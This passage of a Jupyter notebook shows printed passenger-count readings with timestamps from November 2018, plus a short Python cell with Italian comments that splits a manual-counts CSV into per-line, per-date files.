"['2018-11-26 12:54:36', '12']\n",
"['2018-11-26 12:55:27', '12']\n",
"['2018-11-26 13:00:05', '14']\n",
"['2018-11-26 13:01:19', '20']\n",
"['2018-11-26 13:04:27', '26']\n",
"['2018-11-26 13:05:34', '28']\n",
"['2018-11-26 13:06:45', '28']\n",
"['2018-11-26 13:06:58', '28']\n",
"['2018-11-26 13:10:33', '19']\n",
"['2018-11-26 13:14:27', '21']\n",
"['2018-11-26 13:15:16', '21']\n",
"['2018-11-26 13:16:07', '20']\n",
"['2018-11-26 13:18:24', '19']\n",
"['2018-11-26 13:19:01', '21']\n",
"['2018-11-26 13:19:59', '21']\n",
"['2018-11-26 13:21:00', '17']\n",
"['2018-11-26 13:21:56', '16']\n",
"['2018-11-26 13:22:50', '11']\n",
"['2018-11-26 13:23:32', '9']\n",
"['2018-11-26 13:24:39', '8']\n",
"['2018-11-26 13:25:30', '8']\n",
"['2018-11-26 13:25:51', '6']\n",
"['2018-11-26 13:26:59', '4']\n",
"['2018-11-26 13:28:00', '3']\n",
"['2018-11-26 13:29:32', '3']\n",
"['2018-11-26 13:30:00', '3']\n",
"['2018-11-26 13:30:27', '1']\n",
"['2018-11-26 13:31:19', '0']\n",
"['2018-11-26 13:31:57', '0']\n",
"['2018-11-26 13:36:20', '0']\n",
"['2018-11-26 13:37:00', '0']\n",
"['2018-11-26 13:37:24', '0']\n",
"['2018-11-26 13:38:00', '0']\n",
"['2018-11-26 13:39:44', '5']\n",
"['2018-11-26 13:40:59', '5']\n",
"['2018-11-26 13:41:51', '5']\n",
"['2018-11-26 13:42:03', '7']\n",
"['2018-11-26 13:43:04', '7']\n",
"['2018-11-26 13:43:14', '8']\n",
"['2018-11-26 13:44:17', '9']\n",
"['2018-11-26 13:45:29', '9']\n",
"['2018-11-26 13:45:59', '9']\n",
"['2018-11-26 13:46:27', '9']\n",
"['2018-11-26 13:47:11', '10']\n",
"['2018-11-26 13:48:00', '12']\n",
"['2018-11-26 13:49:35', '12']\n",
"['2018-11-26 13:50:06', '18']\n",
"['2018-11-26 13:50:58', '18']\n",
"['2018-11-26 13:52:36', '17']\n",
"['2018-11-26 13:53:17', '18']\n",
"['2018-11-26 13:57:50', '21']\n",
"['2018-11-26 13:59:18', '23']\n",
"['2018-11-26 14:01:44', '25']\n",
"['2018-11-26 14:02:45', '25']\n",
"['2018-11-26 14:04:33', '20']\n",
"['2018-11-26 14:07:25', '21']\n",
"['2018-11-26 14:15:10', '25']\n",
"['2018-11-26 14:18:31', '28']\n",
"['2018-11-26 14:18:57', '25']\n",
"['2018-11-26 14:19:06', '22']\n",
"['2018-11-26 14:20:00', '22']\n",
"['2018-11-26 14:21:03', '21']\n",
"['2018-11-26 14:21:38', '19']\n",
"['2018-11-26 14:22:37', '13']\n",
"['2018-11-26 14:23:26', '12']\n",
"['2018-11-26 14:24:14', '10']\n",
"['2018-11-26 14:25:07', '9']\n",
"['2018-11-26 14:26:03', '7']\n",
"['2018-11-26 14:26:59', '7']\n",
"['2018-11-26 14:27:13', '7']\n",
"['2018-11-26 14:28:35', '7']\n",
"['2018-11-26 14:30:19', '5']\n",
"['2018-11-26 14:31:20', '5']\n",
"['2018-11-26 14:32:33', '2']\n",
"['2018-11-26 14:33:47', '2']\n",
"['2018-11-26 14:35:01', '2']\n",
"['2018-11-26 14:36:15', '0']\n",
"['2018-11-26 14:37:29', '1']\n",
"['2018-11-26 14:37:54', '15']\n",
"['2018-11-26 14:39:55', '18']\n",
"['2018-11-26 14:42:25', '18']\n",
"['2018-11-26 14:42:37', '18']\n",
"['2018-11-26 14:43:30', '18']\n",
"['2018-11-26 14:44:09', '20']\n",
"['2018-11-26 14:44:18', '20']\n",
"['2018-11-26 14:45:07', '23']\n",
"['2018-11-26 14:46:04', '26']\n",
"['2018-11-26 14:46:13', '26']\n",
"['2018-11-26 14:48:16', '27']\n",
"['2018-11-26 14:49:17', '28']\n",
"['2018-11-26 14:50:12', '30']\n",
"['2018-11-26 14:51:26', '30']\n",
"['2018-11-26 14:51:44', '30']\n",
"['2018-11-26 14:54:31', '25']\n",
"['2018-11-26 14:55:17', '24']\n",
"['2018-11-26 14:57:35', '29']\n",
"['2018-11-26 14:58:47', '29']\n",
"['2018-11-26 14:59:47', '32']\n",
"['2018-11-26 15:00:34', '32']\n",
"['2018-11-26 15:04:11', '28']\n",
"['2018-11-26 15:07:19', '28']\n",
"['2018-11-26 15:07:32', '25']\n",
"['2018-11-26 15:08:34', '25']\n",
"['2018-11-26 15:09:36', '25']\n",
"['2018-11-26 15:09:55', '25']\n",
"['2018-11-26 15:10:53', '25']\n",
"['2018-11-26 15:11:49', '23']\n",
"['2018-11-26 15:12:42', '22']\n",
"['2018-11-26 15:13:32', '21']\n",
"['2018-11-26 15:14:14', '20']\n",
"['2018-11-26 15:14:55', '18']\n",
"['2018-11-26 15:16:16', '14']\n",
"['2018-11-26 15:17:08', '10']\n",
"['2018-11-26 15:18:16', '3']\n",
"['2018-11-26 15:19:35', '3']\n",
"['2018-11-26 15:21:08', '3']\n",
"['2018-11-26 15:21:39', '2']\n",
"['2018-11-26 15:22:37', '2']\n",
"['2018-11-26 15:23:09', '2']\n",
"['2018-11-26 15:23:28', '0']\n",
"['2018-11-26 15:31:42', '5']\n",
"['2018-11-26 15:32:19', '5']\n",
"['2018-11-26 15:32:42', '5']\n",
"['2018-11-26 15:33:19', '5']\n",
"['2018-11-26 15:34:23', '5']\n",
"['2018-11-26 15:35:03', '8']\n",
"['2018-11-26 15:35:49', '10']\n",
"['2018-11-26 15:36:02', '11']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 15:36:51', '13']\n",
"['2018-11-26 15:37:29', '13']\n",
"['2018-11-26 15:38:19', '13']\n",
"['2018-11-26 15:39:30', '13']\n",
"['2018-11-26 15:39:54', '13']\n",
"['2018-11-26 15:40:15', '17']\n",
"['2018-11-26 15:41:18', '22']\n",
"['2018-11-26 15:42:23', '24']\n",
"['2018-11-26 15:43:52', '24']\n",
"['2018-11-26 15:44:18', '25']\n",
"['2018-11-26 15:44:58', '26']\n",
"['2018-11-26 15:46:37', '26']\n",
"['2018-11-26 15:46:49', '24']\n",
"['2018-11-26 15:50:33', '23']\n",
"['2018-11-26 15:51:54', '23']\n",
"['2018-11-26 15:52:51', '24']\n",
"['2018-11-26 15:53:53', '20']\n",
"['2018-11-26 15:54:33', '18']\n",
"['2018-11-26 15:56:38', '14']\n",
"['2018-11-26 15:58:27', '14']\n",
"['2018-11-26 16:01:43', '14']\n",
"['2018-11-26 16:02:30', '12']\n",
"['2018-11-26 16:02:37', '12']\n",
"['2018-11-26 16:03:43', '12']\n",
"['2018-11-26 16:05:09', '12']\n",
"['2018-11-26 16:05:23', '12']\n",
"['2018-11-26 16:05:57', '12']\n",
"['2018-11-26 16:06:19', '12']\n",
"['2018-11-26 16:06:41', '11']\n",
"['2018-11-26 16:07:41', '11']\n",
"['2018-11-26 16:08:15', '10']\n",
"['2018-11-26 16:09:10', '9']\n",
"['2018-11-26 16:09:59', '9']\n",
"['2018-11-26 16:11:39', '9']\n",
"['2018-11-26 16:13:59', '4']\n",
"['2018-11-26 16:14:49', '4']\n",
"['2018-11-26 16:15:45', '3']\n",
"['2018-11-26 16:16:42', '0']\n",
"['2018-11-26 16:17:21', '0']\n",
"['2018-11-26 16:17:38', '0']\n",
"['2018-11-26 16:35:24', '1']\n",
"['2018-11-26 16:35:58', '10']\n",
"['2018-11-26 16:38:24', '10']\n",
"['2018-11-26 16:40:37', '10']\n",
"['2018-11-26 16:41:33', '11']\n",
"['2018-11-26 16:41:59', '12']\n",
"['2018-11-26 16:42:33', '12']\n",
"['2018-11-26 16:43:11', '14']\n",
"['2018-11-26 16:44:04', '14']\n",
"['2018-11-26 16:44:33', '14']\n",
"['2018-11-26 16:44:43', '15']\n",
"['2018-11-26 16:46:28', '17']\n",
"['2018-11-26 16:52:10', '18']\n",
"['2018-11-26 16:53:14', '19']\n",
"['2018-11-26 16:54:02', '19']\n",
"['2018-11-26 16:54:55', '19']\n",
"['2018-11-26 16:58:50', '18']\n",
"['2018-11-26 17:00:24', '28']\n",
"['2018-11-26 17:02:25', '31']\n",
"['2018-11-26 17:03:15', '33']\n",
"['2018-11-26 17:06:23', '34']\n",
"['2018-11-26 17:07:09', '33']\n",
"['2018-11-26 17:09:52', '25']\n",
"['2018-11-26 17:12:38', '28']\n",
"['2018-11-26 17:13:29', '31']\n",
"['2018-11-26 17:14:19', '30']\n",
"['2018-11-26 17:17:42', '29']\n",
"['2018-11-26 17:18:34', '33']\n",
"['2018-11-26 17:19:46', '34']\n",
"['2018-11-26 17:20:57', '31']\n",
"['2018-11-26 17:22:06', '29']\n",
"['2018-11-26 17:22:59', '25']\n",
"['2018-11-26 17:23:36', '24']\n",
"['2018-11-26 17:24:56', '24']\n",
"['2018-11-26 17:25:44', '21']\n",
"['2018-11-26 17:26:53', '18']\n",
"['2018-11-26 17:27:57', '14']\n",
"['2018-11-26 17:29:07', '12']\n",
"['2018-11-26 17:29:58', '10']\n",
"['2018-11-26 17:31:34', '10']\n",
"['2018-11-26 17:32:17', '6']\n",
"['2018-11-26 17:33:11', '3']\n",
"['2018-11-26 17:33:57', '0']\n",
"['2018-11-26 17:37:13', '2']\n",
"['2018-11-26 17:37:42', '3']\n",
"['2018-11-26 17:38:29', '4']\n",
"['2018-11-26 17:39:32', '4']\n",
"['2018-11-26 17:40:00', '4']\n",
"['2018-11-26 17:40:36', '2']\n",
"['2018-11-26 17:41:32', '3']\n",
"['2018-11-26 17:42:25', '6']\n",
"['2018-11-26 17:43:22', '6']\n",
"['2018-11-26 17:43:52', '6']\n",
"['2018-11-26 17:43:58', '6']\n",
"['2018-11-26 17:45:01', '7']\n",
"['2018-11-26 17:45:21', '8']\n",
"['2018-11-26 17:46:08', '9']\n",
"['2018-11-26 17:47:16', '13']\n",
"['2018-11-26 17:48:30', '27']\n",
"['2018-11-26 17:50:06', '21']\n",
"['2018-11-26 17:50:40', '19']\n",
"['2018-11-26 17:51:22', '19']\n",
"['2018-11-26 17:52:50', '17']\n",
"['2018-11-26 17:53:38', '15']\n",
"['2018-11-26 18:00:07', '25']\n",
"['2018-11-26 18:01:55', '26']\n",
"['2018-11-26 18:03:47', '26']\n",
"['2018-11-26 18:05:17', '25']\n",
"['2018-11-26 18:05:59', '24']\n",
"['2018-11-26 18:08:22', '22']\n",
"['2018-11-26 18:10:32', '21']\n",
"['2018-11-26 18:13:20', '23']\n",
"['2018-11-26 18:14:06', '24']\n",
"['2018-11-26 18:14:24', '24']\n",
"['2018-11-26 18:17:57', '23']\n",
"['2018-11-26 18:20:00', '21']\n",
"['2018-11-26 18:21:16', '19']\n",
"['2018-11-26 18:22:04', '18']\n",
"['2018-11-26 18:23:04', '18']\n",
"['2018-11-26 18:23:26', '17']\n",
"['2018-11-26 18:24:26', '17']\n",
"['2018-11-26 18:24:57', '17']\n",
"['2018-11-26 18:25:47', '17']\n",
"['2018-11-26 18:26:40', '16']\n",
"['2018-11-26 18:28:30', '18']\n",
"['2018-11-26 18:31:32', '0']\n",
"['2018-11-26 18:32:30', '0']\n",
"['2018-11-26 18:32:58', '0']\n",
"['2018-11-26 18:33:18', '0']\n",
"['2018-11-26 18:34:15', '0']\n",
"['2018-11-26 18:34:33', '0']\n",
"['2018-11-26 18:35:33', '7']\n",
"['2018-11-26 18:36:03', '7']\n",
"['2018-11-26 18:39:23', '18']\n",
"['2018-11-26 18:42:28', '18']\n",
"['2018-11-26 18:42:53', '18']\n",
"['2018-11-26 18:43:19', '18']\n",
"['2018-11-26 18:44:03', '18']\n",
"['2018-11-26 18:44:19', '18']\n",
"['2018-11-26 18:44:43', '18']\n",
"['2018-11-26 18:45:04', '19']\n",
"['2018-11-26 18:45:44', '24']\n",
"['2018-11-26 18:48:29', '25']\n",
"['2018-11-26 18:54:01', '25']\n",
"['2018-11-26 18:54:39', '25']\n",
"['2018-11-26 18:56:13', '25']\n",
"['2018-11-26 18:56:19', '19']\n",
"['2018-11-26 18:59:54', '22']\n",
"['2018-11-26 19:01:02', '24']\n",
"['2018-11-26 19:04:11', '27']\n",
"['2018-11-26 19:05:33', '27']\n",
"['2018-11-26 19:07:21', '28']\n",
"['2018-11-26 19:08:10', '20']\n",
"['2018-11-26 19:10:44', '13']\n",
"['2018-11-26 19:13:25', '13']\n",
"['2018-11-26 19:13:47', '13']\n",
"['2018-11-26 19:15:17', '13']\n",
"['2018-11-26 19:16:27', '12']\n",
"['2018-11-26 19:17:03', '12']\n",
"['2018-11-26 19:17:58', '12']\n",
"['2018-11-26 19:18:53', '12']\n",
"['2018-11-26 19:19:59', '12']\n",
"['2018-11-26 19:20:22', '11']\n",
"['2018-11-26 19:21:08', '11']\n",
"['2018-11-26 19:21:57', '12']\n",
"['2018-11-26 19:23:15', '12']\n",
"['2018-11-26 19:23:38', '10']\n",
"['2018-11-26 19:24:41', '8']\n",
"['2018-11-26 19:25:59', '8']\n",
"['2018-11-26 19:26:21', '5']\n",
"['2018-11-26 19:28:39', '5']\n",
"['2018-11-26 19:29:07', '3']\n",
"['2018-11-26 19:30:00', '2']\n",
"['2018-11-26 19:30:52', '0']\n",
"['2018-11-26 19:36:56', '0']\n",
"['2018-11-26 19:37:48', '0']\n",
"['2018-11-26 19:38:18', '0']\n",
"['2018-11-26 19:38:57', '0']\n",
"['2018-11-26 19:40:58', '0']\n",
"['2018-11-26 19:41:40', '0']\n",
"['2018-11-26 19:42:11', '3']\n",
"['2018-11-26 19:43:20', '3']\n",
"['2018-11-26 19:43:50', '3']\n",
"['2018-11-26 19:44:09', '3']\n",
"['2018-11-26 19:44:22', '3']\n",
"['2018-11-26 19:45:08', '3']\n",
"['2018-11-26 19:45:39', '3']\n",
"['2018-11-26 19:46:03', '3']\n",
"['2018-11-26 19:46:55', '3']\n",
"['2018-11-26 19:47:51', '3']\n",
"['2018-11-26 19:48:47', '3']\n",
"['2018-11-26 19:49:20', '3']\n",
"['2018-11-26 19:49:31', '3']\n",
"['2018-11-26 19:51:43', '3']\n",
"['2018-11-26 19:52:05', '3']\n",
"['2018-11-26 19:56:14', '8']\n",
"['2018-11-26 19:59:34', '8']\n",
"['2018-11-26 20:00:44', '7']\n",
"['2018-11-26 20:02:34', '8']\n",
"['2018-11-26 20:02:53', '12']\n",
"['2018-11-26 20:06:03', '10']\n",
"['2018-11-26 20:07:55', '10']\n",
"['2018-11-26 20:09:56', '11']\n",
"['2018-11-26 20:10:29', '11']\n",
"['2018-11-26 20:10:41', '9']\n",
"['2018-11-26 20:14:30', '10']\n",
"['2018-11-26 20:17:51', '11']\n",
"['2018-11-26 20:18:58', '12']\n",
"['2018-11-26 20:19:28', '11']\n",
"['2018-11-26 20:20:18', '11']\n",
"['2018-11-26 20:20:46', '10']\n",
"['2018-11-26 20:21:12', '11']\n",
"['2018-11-26 20:22:26', '10']\n",
"['2018-11-26 20:23:12', '8']\n",
"['2018-11-26 20:23:51', '7']\n",
"['2018-11-26 20:25:48', '5']\n",
"['2018-11-26 20:28:00', '2']\n",
"['2018-11-26 20:28:47', '0']\n",
"['2018-11-26 20:30:13', '0']\n",
"['2018-11-26 20:31:39', '0']\n",
"['2018-11-26 20:33:05', '0']\n",
"['2018-11-26 20:34:31', '0']\n",
"['2018-11-26 20:35:57', '1']\n",
"['2018-11-26 20:36:29', '6']\n",
"['2018-11-26 20:39:09', '6']\n",
"['2018-11-26 20:41:39', '6']\n",
"['2018-11-26 20:42:04', '6']\n",
"['2018-11-26 20:42:30', '6']\n",
"['2018-11-26 20:43:17', '6']\n",
"['2018-11-26 20:43:34', '6']\n",
"['2018-11-26 20:44:00', '6']\n",
"['2018-11-26 20:44:32', '6']\n",
"['2018-11-26 20:44:55', '6']\n",
"['2018-11-26 20:46:02', '6']\n",
"['2018-11-26 20:47:56', '6']\n",
"['2018-11-26 20:49:00', '7']\n",
"['2018-11-26 20:49:55', '7']\n",
"['2018-11-26 20:51:47', '7']\n",
"['2018-11-26 20:54:50', '8']\n",
"['2018-11-26 20:56:03', '11']\n",
"['2018-11-26 20:59:33', '12']\n",
"['2018-11-26 21:00:39', '12']\n",
"['2018-11-26 21:02:20', '12']\n",
"['2018-11-26 21:03:34', '17']\n",
"['2018-11-26 21:05:12', '24']\n",
"['2018-11-26 21:07:43', '24']\n",
"['2018-11-26 21:07:54', '26']\n",
"['2018-11-26 21:08:39', '25']\n",
"['2018-11-26 21:10:50', '25']\n",
"['2018-11-26 21:11:07', '25']\n",
"['2018-11-26 21:11:40', '21']\n",
"['2018-11-26 21:12:47', '21']\n",
"['2018-11-26 21:13:45', '20']\n",
"['2018-11-26 21:14:39', '16']\n",
"['2018-11-26 21:15:25', '14']\n",
"['2018-11-26 21:16:38', '13']\n",
"['2018-11-26 21:18:09', '13']\n",
"['2018-11-26 21:19:23', '9']\n",
"['2018-11-26 21:20:33', '5']\n",
"['2018-11-26 21:21:38', '1']\n",
"['2018-11-26 21:22:35', '1']\n",
"['2018-11-26 21:26:48', '0']\n",
"['2018-11-26 21:28:02', '0']\n",
"['2018-11-26 21:29:23', '0']\n",
"['2018-11-26 21:30:47', '0']\n",
"['2018-11-26 21:34:08', '1']\n",
"['2018-11-26 21:34:56', '1']\n",
"['2018-11-26 21:35:54', '2']\n",
"['2018-11-26 21:36:18', '2']\n",
"['2018-11-26 21:36:46', '2']\n",
"['2018-11-26 21:37:19', '2']\n",
"['2018-11-26 21:37:32', '2']\n",
"['2018-11-26 21:38:15', '2']\n",
"['2018-11-26 21:38:45', '2']\n",
"['2018-11-26 21:39:08', '2']\n",
"['2018-11-26 21:39:58', '2']\n",
"['2018-11-26 21:40:35', '2']\n",
"['2018-11-26 21:41:29', '2']\n",
"['2018-11-26 21:41:58', '2']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 21:42:07', '2']\n",
"['2018-11-26 21:43:51', '2']\n",
"['2018-11-26 21:44:32', '3']\n",
"['2018-11-26 21:47:37', '3']\n",
"['2018-11-26 21:49:10', '3']\n",
"['2018-11-26 21:50:01', '3']\n",
"['2018-11-26 21:52:21', '3']\n",
"['2018-11-26 21:53:01', '3']\n",
"['2018-11-26 21:54:28', '3']\n",
"['2018-11-26 21:55:40', '0']\n"
]
}
],
"source": [
"#divisore e perfezionatore file manuali\n",
"import csv\n",
"\n",
"import datetime\n",
"\n",
"with open ('Rilevazioni_manuali.csv', encoding = 'utf-8', newline = '') as f:\n",
" lettore = csv.reader (f, delimiter = ',')\n",
" \n",
" next(lettore)\n",
" for riga in lettore:\n",
" \n",
" Linea = int(riga[0])\n",
" \n",
" DaTi = int(riga [1])\n",
" if DaTi>1542848400 and DaTi<1542934800 :\n",
" Data = 22_11_2018\n",
" if DaTi>1542934800 and DaTi<1543021200 :\n",
" Data = 23_11_2018\n",
" if DaTi>1543021200 and DaTi<1543107600 :\n",
" Data = 24_11_2018\n",
" if DaTi>1543107600 and DaTi<1543194000 :\n",
" Data = 25_11_2018\n",
" if DaTi>1543194000 and DaTi<1543280400 :\n",
" Data = 26_11_2018\n",
" else:\n",
" data = 'boh'\n",
" \n",
" t2 = datetime.datetime.fromtimestamp(DaTi\n",
" )\n",
" #print (str(t2))\n",
" with open ('Man_linea_'+str(Linea)+str(Data)+'.csv', 'a') as nuovo:\n",
" passeggeri = []\n",
" passeggeri.append(str(t2))\n",
" passeggeri.append(riga[2])\n",
" print(passeggeri)# linea_11.append(riga[5])\n",
" writer=csv.writer(nuovo, delimiter = ',')\n",
" writer.writerow(passeggeri)\n",
" "
]
},
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 05:10:01.149774', 1]\n",
"['2018-11-22 05:11:44.552385', 2]\n",
"['2018-11-22 05:13:26.585631', 3]\n",
"['2018-11-22 05:14:21.455105', 4]\n",
"['2018-11-22 05:15:16.619168', 5]\n",
"['2018-11-22 05:16:21.755708', 4]\n",
"['2018-11-22 05:21:05.684763', 3]\n",
"['2018-11-22 05:22:01.117153', 4]\n",
"['2018-11-22 05:22:33.076706', 5]\n",
"['2018-11-22 05:22:41.833639', 6]\n",
"['2018-11-22 05:25:01.454146', 7]\n",
"['2018-11-22 05:26:01.063178', 8]\n",
"['2018-11-22 05:26:06.838000', 7]\n",
"['2018-11-22 05:26:08.517036', 8]\n",
"['2018-11-22 05:26:51.718326', 7]\n",
"['2018-11-22 05:27:24.008352', 8]\n",
"['2018-11-22 05:27:24.954317', 9]\n",
"['2018-11-22 05:28:11.975157', 10]\n",
"['2018-11-22 05:29:42.239785', 9]\n",
"['2018-11-22 05:30:23.434685', 10]\n",
"['2018-11-22 05:30:53.552263', 9]\n",
"['2018-11-22 05:31:52.257318', 8]\n",
"['2018-11-22 05:32:11.058018', 7]\n",
"['2018-11-22 05:32:18.995034', 6]\n",
"['2018-11-22 05:32:56.003503', 5]\n",
"['2018-11-22 05:34:37.571737', 4]\n",
"['2018-11-22 05:36:04.827326', 5]\n",
"['2018-11-22 05:40:39.986225', 4]\n",
"['2018-11-22 05:42:26.766570', 5]\n",
"['2018-11-22 05:42:34.790879', 6]\n",
"['2018-11-22 05:45:06.332360', 5]\n",
"['2018-11-22 05:46:46.875034', 4]\n",
"['2018-11-22 06:00:31.992794', 1]\n",
"['2018-11-22 06:01:14.461219', 2]\n",
"['2018-11-22 06:02:44.435528', 3]\n",
"['2018-11-22 06:06:10.018426', 4]\n",
"['2018-11-22 06:07:17.364779', 3]\n",
"['2018-11-22 06:08:13.329796', 4]\n",
"['2018-11-22 06:10:25.843660', 3]\n",
"['2018-11-22 06:12:26.884998', 2]\n",
"['2018-11-22 06:12:36.277192', 3]\n",
"['2018-11-22 06:16:44.379119', 1]\n",
"['2018-11-22 06:19:47.541398', 2]\n",
"['2018-11-22 06:20:02.593902', 3]\n",
"['2018-11-22 06:24:36.044871', 1]\n",
"['2018-11-22 06:29:44.585122', 2]\n",
"['2018-11-22 06:29:46.849977', 3]\n",
"['2018-11-22 06:31:03.058248', 4]\n",
"['2018-11-22 06:31:29.910093', 5]\n",
"['2018-11-22 06:31:35.915965', 6]\n",
"['2018-11-22 06:34:17.121425', 5]\n",
"['2018-11-22 06:34:20.219218', 6]\n",
"['2018-11-22 06:34:20.647713', 7]\n",
"['2018-11-22 06:35:01.185358', 8]\n",
"['2018-11-22 06:35:47.183387', 7]\n",
"['2018-11-22 06:37:00.985235', 6]\n",
"['2018-11-22 06:37:24.983287', 5]\n",
"['2018-11-22 06:37:29.498839', 6]\n",
"['2018-11-22 06:37:41.405000', 7]\n",
"['2018-11-22 06:38:18.575331', 8]\n",
"['2018-11-22 06:38:36.119408', 7]\n",
"['2018-11-22 06:40:20.298634', 6]\n",
"['2018-11-22 06:41:11.002663', 7]\n",
"['2018-11-22 06:42:07.733583', 8]\n",
"['2018-11-22 06:42:41.881419', 7]\n",
"['2018-11-22 06:43:26.006600', 8]\n",
"['2018-11-22 06:43:43.496039', 9]\n",
"['2018-11-22 06:45:11.098440', 10]\n",
"['2018-11-22 06:45:12.998045', 11]\n",
"['2018-11-22 06:45:40.295530', 10]\n",
"['2018-11-22 06:46:15.544969', 9]\n",
"['2018-11-22 06:48:33.525283', 6]\n",
"['2018-11-22 06:48:39.962345', 7]\n",
"['2018-11-22 06:48:46.278015', 8]\n",
"['2018-11-22 06:52:50.698458', 9]\n",
"['2018-11-22 06:55:01.245276', 10]\n",
"['2018-11-22 06:55:50.220454', 11]\n",
"['2018-11-22 06:56:10.014109', 12]\n",
"['2018-11-22 06:56:39.104395', 11]\n",
"['2018-11-22 06:59:02.253999', 12]\n",
"['2018-11-22 06:59:31.937611', 11]\n",
"['2018-11-22 07:00:17.091121', 9]\n",
"['2018-11-22 07:01:05.798093', 8]\n",
"['2018-11-22 07:01:31.500653', 9]\n",
"['2018-11-22 07:02:11.515823', 10]\n",
"['2018-11-22 07:02:42.715070', 11]\n",
"['2018-11-22 07:02:50.416261', 12]\n",
"['2018-11-22 07:03:23.959577', 13]\n",
"['2018-11-22 07:03:57.247620', 11]\n",
"['2018-11-22 07:05:41.977492', 12]\n",
"['2018-11-22 07:05:46.013884', 11]\n",
"['2018-11-22 07:06:43.320140', 9]\n",
"['2018-11-22 07:07:07.869868', 8]\n",
"['2018-11-22 07:07:52.481894', 9]\n",
"['2018-11-22 07:08:38.512696', 10]\n",
"['2018-11-22 07:08:44.046819', 11]\n",
"['2018-11-22 07:09:27.360802', 12]\n",
"['2018-11-22 07:09:34.512325', 11]\n",
"['2018-11-22 07:09:46.159622', 10]\n",
"['2018-11-22 07:09:58.746117', 9]\n",
"['2018-11-22 07:10:46.047447', 10]\n",
"['2018-11-22 07:11:40.827128', 11]\n",
"['2018-11-22 07:12:56.395274', 12]\n",
"['2018-11-22 07:13:02.241457', 13]\n",
"['2018-11-22 07:13:41.997053', 12]\n",
"['2018-11-22 07:14:02.025181', 11]\n",
"['2018-11-22 07:14:29.176852', 10]\n",
"['2018-11-22 07:15:43.774439', 9]\n",
"['2018-11-22 07:16:35.986634', 8]\n",
"['2018-11-22 07:19:56.428313', 9]\n",
"['2018-11-22 07:20:08.142666', 8]\n",
"['2018-11-22 07:21:03.809763', 7]\n",
"['2018-11-22 07:22:03.825746', 6]\n",
"['2018-11-22 07:22:27.556994', 7]\n",
"['2018-11-22 07:22:32.519593', 8]\n",
"['2018-11-22 07:22:40.687815', 9]\n",
"['2018-11-22 07:24:40.156487', 8]\n",
"['2018-11-22 07:25:38.870251', 7]\n",
"['2018-11-22 07:26:43.897580', 4]\n",
"['2018-11-22 07:27:45.847821', 5]\n",
"['2018-11-22 07:28:25.549597', 6]\n",
"['2018-11-22 07:29:56.600509', 5]\n",
"['2018-11-22 07:34:46.611293', 4]\n",
"['2018-11-22 07:35:11.623113', 5]\n",
"['2018-11-22 07:35:13.729722', 6]\n",
"['2018-11-22 07:36:09.323088', 5]\n",
"['2018-11-22 07:36:20.763481', 4]\n",
"['2018-11-22 07:36:50.009867', 3]\n",
"['2018-11-22 07:40:12.219658', 2]\n",
"['2018-11-22 07:40:15.529494', 3]\n",
"['2018-11-22 07:43:39.024825', 4]\n",
"['2018-11-22 07:46:47.178478', 3]\n",
"['2018-11-22 07:46:56.884717', 4]\n",
"['2018-11-22 07:47:11.238162', 5]\n",
"['2018-11-22 07:47:37.863651', 6]\n",
"['2018-11-22 07:48:33.574190', 7]\n",
"['2018-11-22 07:49:05.535069', 8]\n",
"['2018-11-22 07:51:00.136353', 9]\n",
"['2018-11-22 07:51:02.642170', 10]\n",
"['2018-11-22 07:51:54.695082', 11]\n",
"['2018-11-22 07:53:17.233885', 10]\n",
"['2018-11-22 07:53:43.779238', 11]\n",
"['2018-11-22 07:53:55.784801', 12]\n",
"['2018-11-22 07:55:12.557047', 13]\n",
"['2018-11-22 07:55:20.104493', 12]\n",
"['2018-11-22 07:55:25.470563', 13]\n",
"['2018-11-22 07:55:56.371469', 12]\n",
"['2018-11-22 07:56:23.577774', 13]\n",
"['2018-11-22 07:57:11.433808', 14]\n",
"['2018-11-22 07:57:56.474839', 13]\n",
"['2018-11-22 07:58:42.495444', 12]\n",
"['2018-11-22 07:58:57.501227', 11]\n",
"['2018-11-22 07:59:04.933114', 12]\n",
"['2018-11-22 07:59:25.956159', 11]\n",
"['2018-11-22 07:59:40.946344', 10]\n",
"['2018-11-22 08:01:14.233937', 11]\n",
"['2018-11-22 08:01:26.448330', 12]\n",
"['2018-11-22 08:02:04.923254', 13]\n",
"['2018-11-22 08:02:22.067918', 14]\n",
"['2018-11-22 08:02:40.633252', 15]\n",
"['2018-11-22 08:03:40.973875', 14]\n",
"['2018-11-22 08:03:42.806730', 15]\n",
"['2018-11-22 08:04:18.908720', 16]\n",
"['2018-11-22 08:05:03.254138', 15]\n",
"['2018-11-22 08:05:19.662309', 16]\n",
"['2018-11-22 08:05:45.118527', 17]\n",
"['2018-11-22 08:06:11.656689', 14]\n",
"['2018-11-22 08:06:43.910160', 11]\n",
"['2018-11-22 08:06:58.658388', 10]\n",
"['2018-11-22 08:07:11.195225', 11]\n",
"['2018-11-22 08:08:46.058415', 10]\n",
"['2018-11-22 08:09:26.692393', 9]\n",
"['2018-11-22 08:09:38.369698', 8]\n",
"['2018-11-22 08:09:46.921821', 6]\n",
"['2018-11-22 08:11:17.648116', 5]\n",
"['2018-11-22 08:11:33.598006', 6]\n",
"['2018-11-22 08:12:15.970064', 5]\n",
"['2018-11-22 08:13:07.997015', 6]\n",
"['2018-11-22 08:13:15.356807', 7]\n",
"['2018-11-22 08:14:23.934554', 6]\n",
"['2018-11-22 08:15:20.366119', 5]\n",
"['2018-11-22 08:15:34.172281', 4]\n",
"['2018-11-22 08:16:17.247227', 5]\n",
"['2018-11-22 08:18:37.252270', 6]\n",
"['2018-11-22 08:22:53.708680', 5]\n",
"['2018-11-22 08:23:04.005860', 4]\n",
"['2018-11-22 08:23:52.533238', 3]\n",
"['2018-11-22 08:25:08.696874', 4]\n",
"['2018-11-22 08:28:14.153527', 5]\n",
"['2018-11-22 08:30:02.510369', 3]\n",
"['2018-11-22 08:30:04.686794', 4]\n",
"['2018-11-22 08:30:06.686522', 3]\n",
"['2018-11-22 08:34:52.532767', 1]\n",
"['2018-11-22 08:35:01.300413', 2]\n",
"['2018-11-22 08:35:09.711807', 3]\n",
"['2018-11-22 08:39:10.839680', 4]\n",
"['2018-11-22 08:39:57.629272', 3]\n",
"['2018-11-22 08:40:05.935061', 2]\n",
"['2018-11-22 08:40:07.298773', 1]\n",
"['2018-11-22 08:44:22.231721', 2]\n",
"['2018-11-22 08:44:24.289735', 3]\n",
